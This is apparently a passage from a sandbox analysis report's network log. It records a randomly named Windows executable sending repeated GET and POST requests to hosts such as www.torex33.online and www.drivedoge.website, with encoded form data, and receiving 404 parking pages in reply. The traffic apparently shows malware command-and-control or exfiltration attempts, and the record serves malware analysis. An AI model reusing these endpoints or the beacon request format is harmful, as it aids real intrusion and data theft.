                                                                                                                                                                                                              Data Ascii: tpTd=IouU3Atv91U5pPucqcRbnKdG+ucQmsHvcG/gK/CIZjd4P8ZP+L9zISSq8c0aWWnsR/CCo/rHx/uvYY4hycb/sH8qEahO8hKSRDGIh34YGeDtleMiepsW0V+v1GX8c35hIiZ3wBeMBhE4b4HQLYTZmqU1vg35fY8pXVx6igHyZUJt/uZmpKJLEOJlXtmwqXpxk2FFPSpx5awKf0NAHckj0wP6h6uzLdIK1E0VdK6ggK0MO03rppvJKMJGWRI1D63hoyo5S12Av3pg0EcCjyN3QDKM8AZRFqO4CiJjZZB6m9Vv7cQMvnNy9uDGDurXnqfD9Xv59euD+Y5EILkQu2CuJmsn9aujhQ/j5pJbAjwW2Zx6Ggjyh8+giEUtPsO4vPjPbnDkEnTLcP0znuZr55vCb4THI54JjrT4PZLGDWtyRx494hVaqvpvL3CBdgClWMRNORcgb57u+Fg2h9hxNNq8FbqfuaGBfLbuOfdsGXmva6JwNty9EmcQsk1sqBlFzUClvLcKcFhRyooBsSHwMGo4fWY+yUlGqPjV+QCik37JI4gHAaanxsnGuuzUHdApsqzpEgg+9H4VoWsEvRlZtvd3Nk2SN0TNlNblXbFYM3hjr6vB5j6Jf9Y6/vvy3VjM3jVXyxFTROofnEdyER7jU0h/L+FRxE+as8pRYl+VAxlS9AnWZtmDOriS48svbj5aOQKXTfkvZXcq9lYBDJeKxgZ53Srk6zVEhHttROcbr8B+UbIZQioLI+bPg5iR8CiNc3CAxnoU54cBvqCnVlDD/RrHDUWX7XbqzTjHLwWPIuM7hRhMiR7Ht6LjZTewpMwRIrqm1vo9WU4NjClnJ8CHfW9mDPqyVMh9IIgJ7l6js03scURSlXUxJnOL4nnazsHsUmXa2dL/GSjeiUhyT3WxI9Zw3fgL1mCHksWp2Abil0Vx3c2i9KrMCIVKKDUZ60slQ15/b012d9k0J78qvoaJd3JSsqXsufno4KVV8UlUrDx4GW8ryt8 [TRUNCATED]
                                                                                                                                                                                                              Oct 8, 2024 15:36:50.434241056 CEST778INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:36:50 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 634
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              44192.168.2.960859195.161.68.8801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:36:52.255220890 CEST478OUTGET /c6cw/?WX=rnWllP5PLlhLLtj&tpTd=FqG002IG5EdskeSYnMZEmsgm4M8u04DOLE26DOOOZGkEYfdt2aoEMjGd+Okidkvsa7u+peDvqMbFWL8Zvpj7qkQAFbZLww+9EwijpyIUD9D3/88cfw== HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.drivedoge.website
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Oct 8, 2024 15:36:52.997530937 CEST778INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:36:52 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 634
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              45192.168.2.960860194.58.112.174801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:36:58.129393101 CEST737OUTPOST /hd7m/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.torex33.online
                                                                                                                                                                                                              Origin: http://www.torex33.online
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 193
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.torex33.online/hd7m/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 68 4a 7a 6b 57 63 72 30 76 48 64 57 64 56 77 64 78 6a 33 33 54 4f 39 67 46 56 54 65 7a 63 77 5a 6e 45 4c 67 75 4c 34 37 34 4d 37 43 4d 2b 77 45 77 5a 45 38 50 38 37 44 31 77 66 52 46 67 42 30 5a 76 55 7a 47 71 76 5a 54 56 79 45 56 47 7a 71 69 62 51 42 32 41 52 51 78 33 50 65 69 41 6e 6f 37 77 30 54 39 38 54 72 4a 34 56 51 30 68 5a 48 50 73 6d 6a 67 6f 42 67 4b 76 5a 41 76 4d 4d 30 54 54 38 5a 69 74 37 41 6b 53 5a 65 72 36 6c 41 45 6a 78 4b 72 6f 4a 4e 2b 41 72 2b 75 62 43 6c 77 36 49 4f 35 47 53 75 34 47 36 53 31 50 52 5a 4b 77 47 78 4c 33 5a 31 36 2f 4f 38
                                                                                                                                                                                                              Data Ascii: tpTd=hJzkWcr0vHdWdVwdxj33TO9gFVTezcwZnELguL474M7CM+wEwZE8P87D1wfRFgB0ZvUzGqvZTVyEVGzqibQB2ARQx3PeiAno7w0T98TrJ4VQ0hZHPsmjgoBgKvZAvMM0TT8Zit7AkSZer6lAEjxKroJN+Ar+ubClw6IO5GSu4G6S1PRZKwGxL3Z16/O8
                                                                                                                                                                                                              Oct 8, 2024 15:36:58.822611094 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:36:58 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                              Data Raw: 65 33 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 8c fc 40 5d 39 75 ca f4 3d d7 f1 54 dd d2 35 75 7c e9 8b 40 b9 8d 52 18 8d 5d 15 f6 94 c2 24 03 d5 71 64 a3 24 5d b7 24 7a 81 da c8 45 65 d1 0c 39 8a 7c d3 0e 43 4c 30 e9 ef 60 11 59 eb 0d 09 a9 7c cf c4 9f d5 e5 92 20 ed 41 59 03 d9 55 d6 15 83 1b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: e32Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk@]9u=T5u|@R]$qd$]$zEe9|CL0`Y| AYU68i]?s#[!l 7hgGUW]<ftt0y4JHPad%WAPvT6l<6,f#mSQd4Z~gma+|\|j-"RAqnj4T=E|\DL$x7 ;TJmj3h,[J~xA\!hv3y?YdnabJpAS[FlF#d0S6NmX`j(er>\4nz;hXb-`->\(|/U +!~b+&j)Rs,CH-p3;"g=k;jo,u8H%9G+GohB((=v^MH''aQ4$#;Rt2!uZe(x/$)#-8a8j)k^!pc0_kfT0\UGrXo1fmEm_G [TRUNCATED]
                                                                                                                                                                                                              Oct 8, 2024 15:36:58.822639942 CEST1236INData Raw: df d3 f6 e9 ac 13 f3 17 a8 d5 35 06 f0 65 c7 6b b9 6a 23 32 b4 5f 63 c2 28 f0 bd ee d3 8d 02 1e 06 dc 6d 0a 63 ff 02 7a 11 b3 a0 de c7 f1 3d e0 8c 47 98 e2 d8 59 d7 d5 ca 09 47 6d 6d f2 5c 92 b6 0f b6 1b 20 4a 7a 0a e3 fe 19 b1 ef 7e f2 25 5c e4
                                                                                                                                                                                                              Data Ascii: 5ekj#2_c(mcz=GYGmm\ Jz~%\qynT\@)9f@JF@towZYj!;]har`$C/0N1(j$?<,C*r>C+@?: 1AO!V?lX
                                                                                                                                                                                                              Oct 8, 2024 15:36:58.822663069 CEST1236INData Raw: 65 95 c8 78 ff 49 a4 c9 5c 07 ca d2 71 58 e4 a9 68 0a 2f 4e bc 17 83 31 db 87 73 0a 0b d2 a3 b0 4e 89 40 31 89 45 d2 cc 69 01 67 c5 85 e3 09 34 47 4a 0c 2e 7f 04 fe fc 94 c3 3d f6 b5 0c 74 c8 73 54 c4 df 70 37 00 5a e7 1a a0 ee 1a f6 ca f9 66 9a
                                                                                                                                                                                                              Data Ascii: exI\qXh/N1sN@1Eig4GJ.=tsTp7Zf|pAP9'G'y'qP4giyMg=3y"!Tz ^{R|s;.t^JfW##Y?GDA&CU1'pT
                                                                                                                                                                                                              Oct 8, 2024 15:36:58.822674036 CEST112INData Raw: f6 2a 2c 64 ab 42 2d 8e 17 36 9d d0 0f b8 88 c7 bd 5e 34 b2 e7 67 01 8c 73 68 67 d0 d5 2f d5 e6 ae 64 8b 42 98 95 c9 8b 37 6d 74 8c 8d 47 7e 3e 1c 0b 6f 77 ce ca 76 e8 bb a3 48 ad 08 ba 0c 39 6b 9c c1 cf f0 ca 4a 49 48 17 cf 9e c8 11 74 a2 3e 99
                                                                                                                                                                                                              Data Ascii: *,dB-6^4gshg/dB7mtG~>owvH9kJIHt>0f2hS)0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              46192.168.2.960861194.58.112.174801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:37:00.675344944 CEST761OUTPOST /hd7m/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.torex33.online
                                                                                                                                                                                                              Origin: http://www.torex33.online
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 217
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.torex33.online/hd7m/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 68 4a 7a 6b 57 63 72 30 76 48 64 57 64 31 67 64 69 51 66 33 43 75 39 6a 4b 31 54 65 35 38 77 64 6e 45 58 67 75 4b 73 72 34 2b 66 43 4e 66 41 45 33 59 45 38 43 63 37 44 74 41 66 4e 61 51 42 2f 5a 76 59 52 47 76 58 5a 54 56 32 45 56 48 44 71 69 4d 4d 65 77 51 52 53 38 58 50 63 38 77 6e 6f 37 77 30 54 39 38 48 4e 4a 34 4e 51 30 53 42 48 64 35 4b 67 74 49 42 76 65 2f 5a 41 72 4d 4d 77 54 54 38 72 69 6f 65 6e 6b 52 68 65 72 34 39 41 45 33 64 46 2b 34 4a 48 6a 51 71 43 2b 72 2f 43 36 35 64 57 34 6e 32 4e 36 41 6e 31 2f 4f 78 48 62 43 50 71 65 67 5a 53 39 59 48 55 4f 76 66 31 66 62 48 63 67 50 50 46 39 57 77 41 57 4f 31 6d 55 41 3d 3d
                                                                                                                                                                                                              Data Ascii: tpTd=hJzkWcr0vHdWd1gdiQf3Cu9jK1Te58wdnEXguKsr4+fCNfAE3YE8Cc7DtAfNaQB/ZvYRGvXZTV2EVHDqiMMewQRS8XPc8wno7w0T98HNJ4NQ0SBHd5KgtIBve/ZArMMwTT8rioenkRher49AE3dF+4JHjQqC+r/C65dW4n2N6An1/OxHbCPqegZS9YHUOvf1fbHcgPPF9WwAWO1mUA==
                                                                                                                                                                                                              Oct 8, 2024 15:37:01.358906031 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:37:01 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                              Data Raw: 65 33 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 8c fc 40 5d 39 75 ca f4 3d d7 f1 54 dd d2 35 75 7c e9 8b 40 b9 8d 52 18 8d 5d 15 f6 94 c2 24 03 d5 71 64 a3 24 5d b7 24 7a 81 da c8 45 65 d1 0c 39 8a 7c d3 0e 43 4c 30 e9 ef 60 11 59 eb 0d 09 a9 7c cf c4 9f d5 e5 92 20 ed 41 59 03 d9 55 d6 15 83 1b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: e32Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk@]9u=T5u|@R]$qd$]$zEe9|CL0`Y| AYU68i]?s#[!l 7hgGUW]<ftt0y4JHPad%WAPvT6l<6,f#mSQd4Z~gma+|\|j-"RAqnj4T=E|\DL$x7 ;TJmj3h,[J~xA\!hv3y?YdnabJpAS[FlF#d0S6NmX`j(er>\4nz;hXb-`->\(|/U +!~b+&j)Rs,CH-p3;"g=k;jo,u8H%9G+GohB((=v^MH''aQ4$#;Rt2!uZe(x/$)#-8a8j)k^!pc0_kfT0\UGrXo1fmEm_G [TRUNCATED]
                                                                                                                                                                                                              Oct 8, 2024 15:37:01.358947039 CEST1236INData Raw: df d3 f6 e9 ac 13 f3 17 a8 d5 35 06 f0 65 c7 6b b9 6a 23 32 b4 5f 63 c2 28 f0 bd ee d3 8d 02 1e 06 dc 6d 0a 63 ff 02 7a 11 b3 a0 de c7 f1 3d e0 8c 47 98 e2 d8 59 d7 d5 ca 09 47 6d 6d f2 5c 92 b6 0f b6 1b 20 4a 7a 0a e3 fe 19 b1 ef 7e f2 25 5c e4
                                                                                                                                                                                                              Data Ascii: 5ekj#2_c(mcz=GYGmm\ Jz~%\qynT\@)9f@JF@towZYj!;]har`$C/0N1(j$?<,C*r>C+@?: 1AO!V?lX
                                                                                                                                                                                                              Oct 8, 2024 15:37:01.358963013 CEST1236INData Raw: 65 95 c8 78 ff 49 a4 c9 5c 07 ca d2 71 58 e4 a9 68 0a 2f 4e bc 17 83 31 db 87 73 0a 0b d2 a3 b0 4e 89 40 31 89 45 d2 cc 69 01 67 c5 85 e3 09 34 47 4a 0c 2e 7f 04 fe fc 94 c3 3d f6 b5 0c 74 c8 73 54 c4 df 70 37 00 5a e7 1a a0 ee 1a f6 ca f9 66 9a
                                                                                                                                                                                                              Data Ascii: exI\qXh/N1sN@1Eig4GJ.=tsTp7Zf|pAP9'G'y'qP4giyMg=3y"!Tz ^{R|s;.t^JfW##Y?GDA&CU1'pT
                                                                                                                                                                                                              Oct 8, 2024 15:37:01.359042883 CEST112INData Raw: f6 2a 2c 64 ab 42 2d 8e 17 36 9d d0 0f b8 88 c7 bd 5e 34 b2 e7 67 01 8c 73 68 67 d0 d5 2f d5 e6 ae 64 8b 42 98 95 c9 8b 37 6d 74 8c 8d 47 7e 3e 1c 0b 6f 77 ce ca 76 e8 bb a3 48 ad 08 ba 0c 39 6b 9c c1 cf f0 ca 4a 49 48 17 cf 9e c8 11 74 a2 3e 99
                                                                                                                                                                                                              Data Ascii: *,dB-6^4gshg/dB7mtG~>owvH9kJIHt>0f2hS)0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              47192.168.2.960862194.58.112.174801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:37:03.223001003 CEST1774OUTPOST /hd7m/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.torex33.online
                                                                                                                                                                                                              Origin: http://www.torex33.online
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 1229
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.torex33.online/hd7m/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 68 4a 7a 6b 57 63 72 30 76 48 64 57 64 31 67 64 69 51 66 33 43 75 39 6a 4b 31 54 65 35 38 77 64 6e 45 58 67 75 4b 73 72 34 2b 58 43 4e 73 49 45 33 37 73 38 44 63 37 44 6b 67 66 64 61 51 42 59 5a 76 51 56 47 75 71 75 54 58 2b 45 56 68 58 71 31 74 4d 65 35 51 52 53 6a 48 50 52 69 41 6e 35 37 78 45 66 39 2f 2f 4e 4a 34 4e 51 30 55 46 48 65 73 6d 67 76 49 42 67 4b 76 5a 45 76 4d 4d 49 54 58 6f 37 69 6f 62 51 6b 42 42 65 73 59 74 41 46 45 6c 46 6a 49 4a 42 67 51 71 61 2b 72 7a 64 36 35 51 6e 34 6e 79 33 36 48 72 31 39 49 38 76 44 6a 33 73 4b 43 4e 6b 79 70 6e 75 4c 34 76 69 47 4b 36 61 2f 76 50 6c 6b 57 64 63 41 2f 51 64 51 61 44 48 56 62 73 65 77 6f 54 6d 4e 66 73 73 41 59 6b 73 56 31 77 65 6e 43 67 42 4c 2f 32 68 4d 4a 31 35 5a 4c 42 4a 43 72 50 56 58 44 59 31 6e 58 6b 52 70 34 72 79 57 67 4a 47 2f 71 51 30 39 6c 50 61 72 51 4e 55 6c 34 5a 37 51 7a 53 63 78 67 59 46 4f 4b 45 47 45 34 4f 75 54 52 72 6d 4a 32 41 45 53 49 47 79 51 65 44 4f 52 52 44 4e 59 33 33 41 35 56 42 30 36 6a 42 79 42 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: tpTd=hJzkWcr0vHdWd1gdiQf3Cu9jK1Te58wdnEXguKsr4+XCNsIE37s8Dc7DkgfdaQBYZvQVGuquTX+EVhXq1tMe5QRSjHPRiAn57xEf9//NJ4NQ0UFHesmgvIBgKvZEvMMITXo7iobQkBBesYtAFElFjIJBgQqa+rzd65Qn4ny36Hr19I8vDj3sKCNkypnuL4viGK6a/vPlkWdcA/QdQaDHVbsewoTmNfssAYksV1wenCgBL/2hMJ15ZLBJCrPVXDY1nXkRp4ryWgJG/qQ09lParQNUl4Z7QzScxgYFOKEGE4OuTRrmJ2AESIGyQeDORRDNY33A5VB06jByBzBLC5oOi1IE0bg8VMsO5uGBoIPhz0zBymkhWgXW54fED28GBa4PwXI7n+imr5ExSxCiQCmfHHQryJvtx1yD3wkQoiWQcRONs/uQWFJnEuWttKGHTTVSBq0HN4gUUrUazlXQzGM7nXQdUTCjBzNT4TRof5RSW23O4rMgfgPXoIq+iG/MortRjQIwBSlo/Q1KuglwY9rAnp2Xqr9WcsgI0AaXULn8t28tS6I+Ib+rEyGXlZs22eenFt+WH15a/tgzQScpDbFE2n0nmRmA/zOyYi8mdOuhDVWimoIa4N7oFTqW83GNUkObdb7F9qozAY8doxRHtQcZXa+UYharpXxuRV4/eIQHPjUt9+7/Pv+eRuGFAevXLkObLBt4OJyIAsDmjSXhfljVn8VRC8HMGjqMA+iG7Cm6u37/0WMiXhAzodBJ+GkLW/XMDwL6HMuCF64iLpYCycv1U7sOF3iupd2whvwWc+AnCJcyMaJe56rQty9seDReCNpF3VlUhTARMVIe4eF6WxOIpvM58wAxjbIyRysL+DxDxa8ytAinA6VUQbkoehMI60ftg819OlCRYHpWEi3LMOEJH5vWo5xn2PtZPJjDuFLHs8Ct4dlLjTRMBbBF5CQN3NeDtEsiv08JaYh4SPfO9Qn8HvlX444bbCIQEpB6GTGgAfrjPie [TRUNCATED]
                                                                                                                                                                                                              Oct 8, 2024 15:37:03.925353050 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:37:03 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Encoding: gzip
